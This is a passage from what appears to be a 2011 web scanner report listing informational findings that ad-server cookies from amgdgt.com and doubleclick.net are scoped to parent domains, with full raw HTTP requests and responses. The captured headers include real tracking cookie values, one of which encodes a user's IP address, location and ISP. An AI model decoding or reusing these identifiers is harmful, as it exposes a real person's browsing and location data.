Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUYJ.IVY.vv4.gza26C7H7gikEhXMDA3gBY2BgYGRgynjEwPL0FwOj2ioGhnv5DAwMnEBhA5kbqsuBbDDw_RoMFpWvZJRhZGBg2cAoCqTSp4J5iicYuYG85UvBgus8wJTUEkZ.oOCic4xAGxiW1TMKAilGg44tO6wgRgIAPNsUwA--

Response

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/t=c/s=AAAAAQAUFng8aJLBZKJyWoaUyNqjOVxerAdnZW8sdXNhLHQsMTMwNzk2NDAxMjgxMCxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVjdWFkUTg1dE1FcUMuTVg2ZXFWMTU3Y1F2SkpuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RFM01TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVDFRNVQxWjNVRnB3YTB4ZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZaM2QwSkJaMVZEUVZGUlFVRkJRVUZQVW04eVlVRkJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmllRVpDV1Y5TU1WUmtla3BQVFhvNGJGRm1TbTFoU0hoRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNlkwTmxkMmhzU25sUGNsZzJOMGxMYVhWUVJGSlJjRFZOV1ZobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UA=AAAAAQAUhnQKQWw8iyMoLVi0cYxKHn4RAWwDA3gBY2BgYGdgmhjKwGorwsCo9ZSB4f09BgYGTgYGRoOO_acyGZj23WVgtZvPwGh_hIGRKQQhd.Qebn27XuLWt_UXA9P0HwysbisYGPVWMzB8.gw3c9dPTgam7e4MrJ7JDIzmQLt.mSHknr1iYMp4xMDy9BcDo9oqBoZ7.TA5mRuqy4FsZpzmHvj9Aae5u7V4cerbraoLNJfB92swAwM3A4N8JaMMIwMDywZGUSDFYMAItJIhfSpYUPEEIzdQcOEBRgYgtXwpWMk6DzAltYSRHyi46BxYblk9oyCQBwzeA78_goxnYAAAMUtW2g--; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:26:46 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/t=c/s=AAAAAQAUFng8aJLBZKJyWoaUyNqjOVxerAdnZW8sdXNhLHQsMTMwNzk2NDAxMjgxMCxjLDM0NTc2OCxwYyw3NzQ4MyxhYywxNjk5NzYsbyxOMC1TMCxsLDYyMTk1LHBjbGljayxodHRwOi8vYWQuYW1nZGd0LmNvbS9hZHMvdD1jL3M9QUFBQUFRQVVjdWFkUTg1dE1FcUMuTVg2ZXFWMTU3Y1F2SkpuWlc4c2RYTmhMSFFzTVRNd056azJOREF3T0RFM01TeGpMRE0wTmpRMk55eHdZeXczT1Rjd01DeGhZeXd4TnpjNU9URXNieXhPTUMxVE1DeHNMRFkwTURVMExIQmpiR2xqYXl4b2RIUndPaTh2YVdJdVlXUnVlSE11WTI5dEwyTnNhV05yTDBGQlFVRkJRVUZCUVVWQlFVRkJRVUZCUVVGQlVVRkJRVUZIUW0xYVozQkJjRWhCT1VOMFkycEZNRU5yWTBRd1N6RjVUVlJSVDFRNVQxWjNVRnB3YTB4ZllYbEVSMjkyUW1SNU9XczRkbFpPUVVGQlFVRkpkM1ZCUVVNeFFVRkJRV3huU1VGQlFVbEJRVUZDU1RsQlZVRXdWMDFCUVVGRlFVRkJRbFpWTUZGQlZsWk9SVUZPWjBOWFowRjZRekZuUVZaM2QwSkJaMVZEUVZGUlFVRkJRVUZQVW04eVlVRkJRVUZCUVM0dlkyNWtQU0ZpZDFoTVRGRnFZek5uVVZGNVQyZFlSMDVJU0VGVFFVRXZjbVZtWlhKeVpYSTlhSFIwY0RvdkwzZDNkeTUwZDJGamEyeGxMbU52YlM5b1pXRmtiR2x1WlhNdlkyeHBZMnRsYm1NOWFIUjBjRG92TDJGa1kyeHBZMnN1Wnk1a2IzVmliR1ZqYkdsamF5NXVaWFF2WVdOc2F6OXpZVDFzSm1GcFBVSmllRVpDV1Y5TU1WUmtla3BQVFhvNGJGRm1TbTFoU0hoRFRtWnhMVTVOUW5JMU5sVTNRbXBVZUdVelZVaEJRVkZCVW1kQ1NVRkJORUZXUTBGNExVaEZRa2RFU2pGMlMwZDVTMUE0UjI5SlFrWXlUbWhNV0VJeFdXa3dNMDVFYXpCTlZGVXlUVVJKTTAxRVJUUk5lbEY1YjBGSVJEaDJNM05CTjBsQ1JETmtNMlI1TlRCa01rWnFZVEo0YkV4dFRuWmlZbTlDUTFSamVVOUlaelZOUmpsb1l6aG5Ra05rYjBKSlIyZ3daRWhCTmt4NU9UTmtNMk4xWkVoa2FGa3lkSE5hVXpWcVlqSXdkbUZIVm1oYVIzaHdZbTFXZW0xQlRGRkVPRUZEUWsxblEyaGtURkJEY1dkRVFXVm5SR2xCVEc5Qk4xVkpPVkZOUVVGQlJFRm5RV0ZIY0hGaFluazRWR1I0WDBWQ0ptNTFiVDB4Sm5OcFp6MUJSMmxYY1hSNlkwTmxkMmhzU25sUGNsZzJOMGxMYVhWUVJGSlJjRFZOV1ZobkptTnNhV1Z1ZEQxallTMXdkV0l0TnpRNU5ERTFOakF5TnpBeE9ETTBNaVpoWkhWeWJEMEsvY2xrdXJsPQo-/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003240&bpp=7&shv=r20110608&jsv=r20110607&correlator=1307964003248&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1065&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=1&dtd=21&xpc=5g2L9BvBMy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUVB4zM_Ou.qtt.rjIgldJ4nRzCJgDA3gBY2BgYGZgmv6DgdVtBQOj3moGhk.fGRgYOBkYGA06dv3kZGDa7s7A6pnMwGgewsDwywwh9.wVA1PGIwaWp78YGNVWMTDcy4fJydxQXQ5kg4Hv12AGBi4GBvlKRhlGBgaWDYyiQIrBgJEBSKVPBQsqnmDkBvKWLwXLrfMAU1JLGPmBgovOgVUuq2cUBPLAbgKaBgIARjIjhg--

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUhnQKQWw8iyMoLVi0cYxKHn4RAWwDA3gBY2BgYGdgmhjKwGorwsCo9ZSB4f09BgYGTgYGRoOO_acyGZj23WVgtZvPwGh_hIGRKQQhd.Qebn27XuLWt_UXA9P0HwysbisYGPVWMzB8.gw3c9dPTgam7e4MrJ7JDIzmQLt.mSHknr1iYMp4xMDy9BcDo9oqBoZ7.TA5mRuqy4FsZpzmHvj9Aae5u7V4cerbraoLNJfB92swAwM3A4N8JaMMIwMDywZGUSDFYMAItJIhfSpYUPEEIzdQcOEBRgYgtXwpWMk6DzAltYSRHyi46BxYblk9oyCQBwzeA78_goxnYAAAMUtW2g--; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:26:46 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ad.amgdgt.com/ads/t=c/s=AAAAAQAUcuadQ85tMEqC.MX6eqV157cQvJJnZW8sdXNhLHQsMTMwNzk2NDAwODE3MSxjLDM0NjQ2NyxwYyw3OTcwMCxhYywxNzc5OTEsbyxOMC1TMCxsLDY0MDU0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBQUVBQUFBQUFBQUFBUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRT1Q5T1Z3UFpwa0xfYXlER292QmR5OWs4dlZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSTlBVUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQVZ3d0JBZ1VDQVFRQUFBQUFPUm8yYUFBQUFBQS4vY25kPSFid1hMTFFqYzNnUVF5T2dYR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJieEZCWV9MMVRkekpPTXo4bFFmSm1hSHhDTmZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTFFEOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREFnQWFHcHFhYnk4VGR4X0VCJm51bT0xJnNpZz1BR2lXcXR6Y0Nld2hsSnlPclg2N0lLaXVQRFJRcDVNWVhnJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
Content-Length: 0
Date: Mon, 13 Jun 2011 11:26:45 GMT

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.amgdgt.com
Path:	/ads/t=c/s=AAAAAQAUcuadQ85tMEqC.MX6eqV157cQvJJnZW8sdXNhLHQsMTMwNzk2NDAwODE3MSxjLDM0NjQ2NyxwYyw3OTcwMCxhYywxNzc5OTEsbyxOMC1TMCxsLDY0MDU0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBQUVBQUFBQUFBQUFBUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRT1Q5T1Z3UFpwa0xfYXlER292QmR5OWs4dlZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSTlBVUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQVZ3d0JBZ1VDQVFRQUFBQUFPUm8yYUFBQUFBQS4vY25kPSFid1hMTFFqYzNnUVF5T2dYR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJieEZCWV9MMVRkekpPTXo4bFFmSm1hSHhDTmZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTFFEOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREFnQWFHcHFhYnk4VGR4X0VCJm51bT0xJnNpZz1BR2lXcXR6Y0Nld2hsSnlPclg2N0lLaXVQRFJRcDVNWVhnJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UA=AAAAAQAUIn3IhJ6M0baJsE3jqtdz8MMhcT0DA3gBY2BgYGdgmhjKwGorwsCo9ZSB4f09BgYGTgYGRoOO_acyGZj23WVgtZvPwGh_hIGRKQQhd.Qebn27XuLWt_UXA9P0HwysbisYGPVWMzB8.gw3c9dPTgam7e4MrJ7JDIzmQLt.mSHknr1iYMp4xMDy9BcDo9oqBoZ7.TA5mRuqy4FsZpx6D7Jk4ZTbrcWL0z27VXWB5jL4fg1mYOBmYJCvZJRhZGBg2cAoCqQYDBiBVjKkTwULKp5g5AYKLjzAyACkli8FK1nnAaakljDyAwUXnQPLLatnFATygMF7kCUbZDwDAwD4TFIM; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:26:48 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ads/t=c/s=AAAAAQAUcuadQ85tMEqC.MX6eqV157cQvJJnZW8sdXNhLHQsMTMwNzk2NDAwODE3MSxjLDM0NjQ2NyxwYyw3OTcwMCxhYywxNzc5OTEsbyxOMC1TMCxsLDY0MDU0LHBjbGljayxodHRwOi8vaWIuYWRueHMuY29tL2NsaWNrL0FBQUFBQUFBQUVBQUFBQUFBQUFBUUFBQUFHQm1aZ3BBcEhBOUN0Y2pFMENrY0QwSzF5TVRRT1Q5T1Z3UFpwa0xfYXlER292QmR5OWs4dlZOQUFBQUFJd3VBQUMxQUFBQWxnSUFBQUlBQUFCSTlBVUEwV01BQUFFQUFBQlZVMFFBVlZORUFOZ0NXZ0F6QzFnQVZ3d0JBZ1VDQVFRQUFBQUFPUm8yYUFBQUFBQS4vY25kPSFid1hMTFFqYzNnUVF5T2dYR05ISEFTQUEvcmVmZXJyZXI9aHR0cDovL3d3dy50d2Fja2xlLmNvbS9oZWFkbGluZXMvY2xpY2tlbmM9aHR0cDovL2FkY2xpY2suZy5kb3VibGVjbGljay5uZXQvYWNsaz9zYT1sJmFpPUJieEZCWV9MMVRkekpPTXo4bFFmSm1hSHhDTmZxLU5NQnI1NlU3QmpUeGUzVUhBQVFBUmdCSUFBNEFWQ0F4LUhFQkdESjF2S0d5S1A4R29JQkYyTmhMWEIxWWkwM05EazBNVFUyTURJM01ERTRNelF5b0FIRDh2M3NBN0lCRDNkM2R5NTBkMkZqYTJ4bExtTnZiYm9CQ1RjeU9IZzVNRjloYzhnQkNkb0JJR2gwZEhBNkx5OTNkM2N1ZEhkaFkydHNaUzVqYjIwdmFHVmhaR3hwYm1Wem1BTFFEOEFDQk1nQ2hkTFBDcWdEQWVnRGlBTG9BN1VJOVFNQUFBREFnQWFHcHFhYnk4VGR4X0VCJm51bT0xJnNpZz1BR2lXcXR6Y0Nld2hsSnlPclg2N0lLaXVQRFJRcDVNWVhnJmNsaWVudD1jYS1wdWItNzQ5NDE1NjAyNzAxODM0MiZhZHVybD0K/clkurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign HTTP/1.1
Host: ad.amgdgt.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003240&bpp=7&shv=r20110608&jsv=r20110607&correlator=1307964003248&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1065&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=1&dtd=21&xpc=5g2L9BvBMy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ID=AAAAAQAU0Z06Q290mxcAejSqzMxWLrFym.cAACZkdjLMHkNuvdKBRA1M_PcAAAEv9nh2mw--; LO=AAAAAQAUYn__ZmG8acLIZhvDLvm3d2V86m4BAHVzYTt2dDs1MjM7c3Rvd2U7MDU2NzI7c29mdGxheWVyIHRlY2hub2xvZ2llcyBpbmMuO2Jyb2FkYmFuZDsxNzMuMTkzLjIxNC4yNDM-; UA=AAAAAQAUxnk1GP68FrmdGBoHXicGprhpArwDA3gBY2BgYGZgmv6DgdVtBQOj3moGhk.fGRgYOBkYGA06dv3kZGDa7s7A6pnMwGgewsDwywwh9.wVA1PGIwaWp78YGNVWMTDcy4fJydxQXQ5kM.I0d7eqLlCewfdrMAMDFwODfCWjDCMDA8sGRlEgxWDACNTKkD4VLKh4gpEbyFu.FCy3zgNMSS1h5AcKLjoHVrmsnlEQyAO6d7eqPshcBgYApdsp6w--

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: UA=AAAAAQAUIn3IhJ6M0baJsE3jqtdz8MMhcT0DA3gBY2BgYGdgmhjKwGorwsCo9ZSB4f09BgYGTgYGRoOO_acyGZj23WVgtZvPwGh_hIGRKQQhd.Qebn27XuLWt_UXA9P0HwysbisYGPVWMzB8.gw3c9dPTgam7e4MrJ7JDIzmQLt.mSHknr1iYMp4xMDy9BcDo9oqBoZ7.TA5mRuqy4FsZpx6D7Jk4ZTbrcWL0z27VXWB5jL4fg1mYOBmYJCvZJRhZGBg2cAoCqQYDBiBVjKkTwULKp5g5AYKLjzAyACkli8FK1nnAaakljDyAwUXnQPLLatnFATygMF7kCUbZDwDAwD4TFIM; Domain=.amgdgt.com; Expires=Wed, 13-Jul-2011 11:26:48 GMT; Path=/
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-cache, no-store
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Location: http://ib.adnxs.com/click/AAAAAAAAAEAAAAAAAAAAQAAAAGBmZgpApHA9CtcjE0CkcD0K1yMTQOT9OVwPZpkL_ayDGovBdy9k8vVNAAAAAIwuAAC1AAAAlgIAAAIAAABI9AUA0WMAAAEAAABVU0QAVVNEANgCWgAzC1gAVwwBAgUCAQQAAAAAORo2aAAAAAA./cnd=!bwXLLQjc3gQQyOgXGNHHASAA/referrer=http://www.twackle.com/headlines/clickenc=http://adclick.g.doubleclick.net/aclk?sa=l&ai=BbxFBY_L1TdzJOMz8lQfJmaHxCNfq-NMBr56U7BjTxe3UHAAQARgBIAA4AVCAx-HEBGDJ1vKGyKP8GoIBF2NhLXB1Yi03NDk0MTU2MDI3MDE4MzQyoAHD8v3sA7IBD3d3dy50d2Fja2xlLmNvbboBCTcyOHg5MF9hc8gBCdoBIGh0dHA6Ly93d3cudHdhY2tsZS5jb20vaGVhZGxpbmVzmALQD8ACBMgChdLPCqgDAegDiALoA7UI9QMAAADAgAaGpqaby8Tdx_EB&num=1&sig=AGiWqtzcCewhlJyOrX67IKiuPDRQp5MYXg&client=ca-pub-7494156027018342&adurl=http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
Content-Length: 0
Date: Mon, 13 Jun 2011 11:26:48 GMT

12.10. http://ad.doubleclick.net/ad/N2949.280881.BUZZMEDIA/B5492484.13 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N2949.280881.BUZZMEDIA/B5492484.13

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=cd8dec33800006c||t=1307964754|et=730|cs=qxekojto; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:32:34 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:32:34 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N2949.280881.BUZZMEDIA/B5492484.13;sz=1x1;ord=?1307964752019 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://creativeby1.unicast.com/script/V3.00/deliver2.html?pid=72996&cid=13937&pub=1944&a=445236&VwDebug=false&pc=444947&exp=%27070411%27&fc=false&sc=false&png='http%253A//ping1.unicast.com/adstracking.gif%253FDV%253D3.80%2526PT%253DI%2526AD%253D445236%2526VD%253D0%2526AV%253D_AV_%2526PV%253D_PV_%2526CV%253D_CV_%2526RV%253D_RV_%2526UV%253D_UV_%2526UC%253D_UC_%2526VP%253D0.0.0.0%2526VU%253D_VU_%2526RD%253D4701341____CH%253D'&pip=''&tpi='http%253A//ad.doubleclick.net/ad/N2949.280881.BUZZMEDIA/B5492484.13%253Bsz%253D1x1%253Bord%253D%3F1307964752019'&rd=0.29164366819895804
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Mon, 13 Jun 2011 11:32:34 GMT
Location: http://s0.2mdn.net/viewad/2703878/6-1x1pixel.gif
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=cd8dec33800006c||t=1307964754|et=730|cs=qxekojto; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:32:34 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:32:34 GMT
Server: GFE/2.0
Content-Type: text/html

12.11. http://ad.doubleclick.net/ad/N5762.1420.TIME.COM1/B5345366.23 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N5762.1420.TIME.COM1/B5345366.23

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c36cbc3380000fc||t=1307964182|et=730|cs=wi8qmwql; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:23:02 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:23:02 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ad/N5762.1420.TIME.COM1/B5345366.23;sz=1x1;ord=??1307963898594 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://creativeby1.unicast.com/script/V3.00/deliver2.html?pid=69087&cid=13220&pub=65&a=426862&VwDebug=false&pc=425702&exp=%27070111%27&fc=false&sc=false&png='http%253A//ping1.unicast.com/adstracking.gif%253FDV%253D3.80%2526PT%253DI%2526AD%253D426862%2526VD%253D0%2526AV%253D_AV_%2526PV%253D_PV_%2526CV%253D_CV_%2526RV%253D_RV_%2526UV%253D_UV_%2526UC%253D_UC_%2526VP%253D0.0.0.0%2526VU%253D_VU_%2526RD%253D3278409____CH%253D'&pip='http%253A//ad.doubleclick.net/imp%253Bv7%253Bj%253B236573386%253B0-0%253B1%253B27141466%253B0/0%253B41612945/41630732/1%253B%253B%257Eaopt%253D2/1/57/0%253B%257Eokv%253D%253Baid%253D15917%253Bsz%253D728x90%253Bpath%253D2011%253Bpath%253D06%253Bpath%253D13%253Bpath%253Dgame-of-thrones-watch-its-all-in-the-execution-2%253Bdcove%253Dd%253Bdcopt%253Dist%253Bpgurl%253D1%253Btile%253D1%253B%257Ecs%253Dv%25253fhttp%253A//s0.2mdn.net/dot.gif%3F1307963898594'&tpi='http%253A//ad.doubleclick.net/ad/N5762.1420.TIME.COM1/B5345366.23%253Bsz%253D1x1%253Bord%253D%253F%3F1307963898594'&rd=0.9168381718918681
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/907846/15127,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Date: Mon, 13 Jun 2011 11:23:02 GMT
Location: http://s0.2mdn.net/viewad/3098454/1x1_image.jpg
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: id=c36cbc3380000fc||t=1307964182|et=730|cs=wi8qmwql; path=/; domain=.doubleclick.net; expires=Wed, 12 Jun 2013 11:23:02 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Sun, 12 Jun 2011 11:23:02 GMT
Server: GFE/2.0
Content-Type: text/html

12.12. http://ad.doubleclick.net/ad/N5776.time.comOX3940/B5358797.2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N5776.time.comOX3940/B5358797.2

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

